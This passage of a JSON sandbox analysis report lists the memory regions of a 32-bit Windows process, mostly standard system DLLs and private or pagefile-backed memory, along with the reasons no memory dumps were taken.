"ref_process_dump": null, "size": 1572864, "start_va": 2009792512, "type": "region", "version": 1 }, "end_va": 2011365375, "entry_point": 2009792512, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2900", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2009792512, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2901", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2902", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2903", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2904", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2905", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2906", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2907", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 851967, "entry_point": 0, "filename": null, "id": "region_2947", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:05:13.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_2948", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:05:13.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_2949", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:05:13.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1950154752, "type": "region", "version": 1 }, "end_va": 1950187519, "entry_point": 1950154752, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2950", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1950154752, "timestamp": "00:05:13.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1950220288, "type": "region", "version": 1 }, "end_va": 1950597119, "entry_point": 1950220288, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2951", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1950220288, "timestamp": "00:05:13.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1950613504, "type": "region", "version": 1 }, "end_va": 1950871551, "entry_point": 1950613504, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2952", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1950613504, "timestamp": "00:05:13.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2953", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:05:13.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2954", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_2955", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4354047, "entry_point": 3932160, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2956", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 3932160, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5636095, "entry_point": 0, "filename": null, "id": "region_2957", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1971322880, "type": "region", "version": 1 }, "end_va": 1971372031, "entry_point": 1971322880, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2958", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1971322880, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1971781631, "entry_point": 1971388416, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2959", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973157888, "type": "region", "version": 1 }, "end_va": 1974271999, "entry_point": 1973157888, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2960", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973157888, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1978073088, "type": "region", "version": 1 }, "end_va": 1978777599, "entry_point": 1978073088, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2961", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1978073088, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1986265088, "type": "region", "version": 1 }, "end_va": 1986551807, "entry_point": 1986265088, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2962", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1986265088, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1987903488, "type": "region", "version": 1 }, "end_va": 1988005887, "entry_point": 1987903488, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2963", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1987903488, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1988100096, "type": "region", "version": 1 }, "end_va": 1989083135, "entry_point": 1988100096, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2964", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1988100096, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2005598208, "type": "region", "version": 1 }, "end_va": 2006622207, "entry_point": 0, "filename": null, "id": "region_2965", "name": "private_0x00000000778b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2005598208, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2006646784, "type": "region", "version": 1 }, "end_va": 2007822335, "entry_point": 0, "filename": null, "id": "region_2966", "name": "private_0x00000000779b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2006646784, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2967", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2968", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:05:13.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1972109312, "type": "region", "version": 1 }, "end_va": 1973157887, "entry_point": 1972109312, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2969", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1972109312, "timestamp": "00:05:13.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1989476352, "type": "region", "version": 1 }, "end_va": 1990066175, "entry_point": 1989476352, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2970", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1989476352, "timestamp": "00:05:13.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989124095, "entry_point": 1989083136, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2971", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:05:13.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1980825600, "type": "region", "version": 1 }, "end_va": 1981468671, "entry_point": 1980825600, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2972", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1980825600, "timestamp": "00:05:13.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 2004090880, "type": "region", "version": 1 }, "end_va": 2004746239, "entry_point": 2004090880, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2973", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 2004090880, "timestamp": "00:05:13.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 122880, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 253951, "entry_point": 131072, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2974", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 131072, "timestamp": "00:05:13.059", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 7241727, "entry_point": 0, "filename": null, "id": "region_2975", "name": "pagefile_0x0000000000560000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5636096, "timestamp": "00:05:13.059", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1980432384, "type": "region", "version": 1 }, "end_va": 1980825599, "entry_point": 1980432384, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2977", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1980432384, "timestamp": "00:05:13.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1985413120, "type": "region", "version": 1 }, "end_va": 1986248703, "entry_point": 1985413120, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2978", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1985413120, "timestamp": "00:05:13.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7274496, "type": "region", "version": 1 }, "end_va": 8851455, "entry_point": 0, "filename": null, "id": "region_2979", "name": "pagefile_0x00000000006f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7274496, "timestamp": "00:05:13.062", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9895936, "type": "region", "version": 1 }, "end_va": 30867455, "entry_point": 0, "filename": null, "id": "region_2980", "name": "pagefile_0x0000000000970000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9895936, "timestamp": "00:05:13.062", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_2984", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:05:13.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2985", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:05:13.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 0, "filename": null, "id": "region_2986", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:05:13.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_2987", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:05:13.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 30867456, "type": "region", "version": 1 }, "end_va": 35008511, "entry_point": 0, "filename": null, "id": "region_2988", "name": "pagefile_0x0000000001d70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30867456, "timestamp": "00:05:13.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1982070784, "type": "region", "version": 1 }, "end_va": 1983238143, "entry_point": 1982070784, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_2989", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1982070784, "timestamp": "00:05:13.074", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1983250432, "type": "region", "version": 1 }, "end_va": 1983299583, "entry_point": 1983250432, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_2990", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1983250432, "timestamp": "00:05:13.075", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1990656000, "type": "region", "version": 1 }, "end_va": 2003542015, "entry_point": 1990656000, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_2991", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1990656000, "timestamp": "00:05:13.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1983315968, "type": "region", "version": 1 }, "end_va": 1983672319, "entry_point": 1983315968, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2992", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1983315968, "timestamp": "00:05:13.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1974272000, "type": "region", "version": 1 }, "end_va": 1974292479, "entry_point": 1974272000, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_2993", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1974272000, "timestamp": "00:05:13.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1974337536, "type": "region", "version": 1 }, "end_va": 1975762943, "entry_point": 1974337536, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2994", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1974337536, "timestamp": "00:05:13.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1978793984, "type": "region", "version": 1 }, "end_va": 1979797503, "entry_point": 1978793984, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_2996", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1978793984, "timestamp": "00:05:13.134", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987862527, "entry_point": 1986592768, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_2997", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:05:13.134", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1981480960, "type": "region", "version": 1 }, "end_va": 1982066687, "entry_point": 1981480960, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2998", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1981480960, "timestamp": "00:05:13.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1975779328, "type": "region", "version": 1 }, "end_va": 1977855999, "entry_point": 1975779328, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_2999", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1975779328, "timestamp": "00:05:13.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1969815552, "type": "region", "version": 1 }, "end_va": 1969848319, "entry_point": 1969815552, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3000", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1969815552, "timestamp": "00:05:13.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_3001", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:05:13.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1969684480, "type": "region", "version": 1 }, "end_va": 1969774591, "entry_point": 1969684480, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3002", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1969684480, "timestamp": "00:05:13.140", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 5160959, "entry_point": 4915200, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3003", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 4915200, "timestamp": "00:05:13.140", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1969422336, "type": "region", "version": 1 }, "end_va": 1969663999, "entry_point": 1969422336, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3013", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1969422336, 